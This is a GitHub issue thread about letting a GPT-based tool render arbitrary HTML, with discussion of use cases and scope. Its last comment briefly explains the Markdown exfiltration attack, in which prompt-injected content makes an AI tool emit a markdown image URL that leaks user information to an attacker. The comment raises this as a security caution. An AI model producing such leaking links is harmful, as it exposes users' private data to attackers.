Allow gpt tool calling to render arbitrary HTML output
pokey opened this issue · 6 comments
would be cool to let gpt just output arbitrary html to be rendered. need to think about security implications and def out of scope for this PR
Originally posted by @pokey in #13 (comment)
Could you elaborate on the use case for this? I have just been using the HTML builder and passing in any text which has been working fine for generally displaying text. Were you thinking of something more specific?
I'm imagining that the model can do nicer formatting and even might be able to reference images (etc) someday. Allowing arbitrary html output could be very powerful. Hard to know without trying it out.
I am just a bit worried about feature creep. I am inclined to wait on some of these additional features until there is other demand for them.
This is not at all urgent. I am not proposing we implement this soon. Just wanted to open the issue as a place to jot down use cases as they come up. If you'd prefer we use a discussion rather than an issue for that, that's fine with me
I think tables / lists are prob the most likely to be useful from my perspective. But I have nothing concrete at this point
Are you arguing that richer html formatting is completely out of scope for this repo, or that it doesn't make sense to implement until we have a good use case?
Great sounds good thanks for that context. I will keep this open as an issue since I think it gets more visibility. I don't have strong opinions on scope, I just wanted to make sure I understood if we had specific ideas and what their scope might be (ie is the HTML generation coming from the model through prompting or is it interacting with the HTML Builder code). But no worries at all we can discuss this as ideas arise.
Another option to consider here is Markdown rendering, which is considerably more constrained than arbitrary HTML, and is what most models are trained to output by default. Even still you will need to be careful about prompt injection attacks -- for example many AI tools that have displayed markdown have suffered from the Markdown exfiltration attack, which uses a markdown image URL to send the attacker information that the AI has learned about the user. The attack surface would be far greater for HTML, though.